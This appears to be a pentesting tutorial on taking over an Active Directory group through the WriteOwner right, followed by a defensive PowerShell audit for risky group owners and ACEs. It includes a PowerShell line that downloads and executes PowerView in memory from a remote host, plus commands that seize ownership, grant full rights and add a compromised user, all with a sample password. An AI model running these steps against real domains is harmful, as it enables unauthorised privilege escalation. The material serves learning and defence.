WriteOwner

Object owners retain the ability to modify object security descriptors, regardless of permissions on the object's DACL.

Assume a user has WriteOwner on a group. We can take ownership of the group and then add ourselves, or any other user we have compromised, to that group. We start by looking at the BloodHound graph. In this case a user called JDGODD has WriteOwner on a group called Core Staff, so we can take control of the group using PowerView.

We start by importing PowerView. We can execute in memory by using IEX.

iex(new-object net.webclient).downloadstring('http://10.10.xxpowers.xx/PowerView.ps1')

Then we take JDgodd's password and build a credential object, stored in a variable called $Cred.

$SecPassword = ConvertTo-SecureString 'Password1!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('DOMAIN\JDgodd', $SecPassword)

Now we change the owner of the group to JDgodd and then, as the new owner, grant JDgodd full rights on its DACL.

Set-DomainObjectOwner -Identity 'CORE STAFF' -OwnerIdentity JDgodd -Cred $cred
Add-DomainObjectAcl -TargetIdentity "CORE STAFF" -PrincipalIdentity JDgodd -Cred $cred -Rights All

Finally, we add the user to the group.

Add-DomainGroupMember -Identity 'CORE STAFF' -Members 'JDgodd' -Cred $cred

To verify the membership: net group "CORE STAFF" /domain

Alternative Method

We can also do this over LDAP with a tool called ldap_shell.

ldap_shell domain.local/JDgodd:Password1 -dc-ip 10.10.xx.xx

Once we have an interactive session, two commands grant the rights we need and add the user to the group.

set_genericall "CORE STAFF" "JDGODD"
add_user_to_group "JDGODD" "CORE STAFF"
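From the defender's side, both methods above leave the same preconditions to look for: a group whose owner is not an admin group, or an explicit ACE granting WriteOwner, WriteDacl or GenericAll to an ordinary principal (the edge BloodHound draws). The following PowerShell audit is an added example, not from the original page; it assumes the RSAT ActiveDirectory module and read access to group security descriptors, and the expected-owner and expected-principal lists are assumptions to adjust per domain.

```powershell
# Added example: list AD groups with an unexpected owner or a dangerous explicit ACE.
# Assumes the RSAT ActiveDirectory module; $ExpectedOwners / $ExpectedPrincipals are assumptions.
Import-Module ActiveDirectory

# Owners normally seen on AD groups (assumption: adjust to your domain's standard).
$ExpectedOwners = @('Domain Admins', 'Enterprise Admins', 'Administrators')
# Principals that legitimately hold powerful rights on groups (assumption; extend as needed).
$ExpectedPrincipals = @('SYSTEM', 'Domain Admins', 'Enterprise Admins', 'Administrators',
                        'ENTERPRISE DOMAIN CONTROLLERS')

# Rights that let a principal rewrite ownership or the DACL and so take over the group.
$Dangerous = [System.DirectoryServices.ActiveDirectoryRights]::WriteOwner -bor `
             [System.DirectoryServices.ActiveDirectoryRights]::WriteDacl  -bor `
             [System.DirectoryServices.ActiveDirectoryRights]::GenericAll

$Findings = foreach ($Group in Get-ADGroup -Filter * -Properties nTSecurityDescriptor) {
    $Sd = $Group.nTSecurityDescriptor

    # 1. Unexpected owner: the owner may rewrite the DACL regardless of its current contents.
    $OwnerName = ([string]$Sd.Owner -split '\\')[-1]
    if ($ExpectedOwners -notcontains $OwnerName) {
        [pscustomobject]@{ Group = $Group.Name; Type = 'UnexpectedOwner'
                           Principal = [string]$Sd.Owner; Rights = 'Owner' }
    }

    # 2. Explicit (non-inherited) allow ACEs granting WriteOwner, WriteDacl or GenericAll.
    foreach ($Ace in $Sd.Access) {
        if ($Ace.AccessControlType -ne 'Allow' -or $Ace.IsInherited) { continue }
        if ([int]($Ace.ActiveDirectoryRights -band $Dangerous) -eq 0) { continue }
        $Who = ($Ace.IdentityReference.Value -split '\\')[-1]
        if ($ExpectedPrincipals -contains $Who) { continue }
        [pscustomobject]@{ Group = $Group.Name; Type = 'DangerousAce'
                           Principal = $Ace.IdentityReference.Value
                           Rights = $Ace.ActiveDirectoryRights }
    }
}

$Findings | Sort-Object Group, Type | Format-Table -AutoSize
```

A group like the one in the walkthrough would show up as a DangerousAce row for JDgodd before the takeover, and as an UnexpectedOwner row afterwards, so the same query doubles as a post-incident check.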
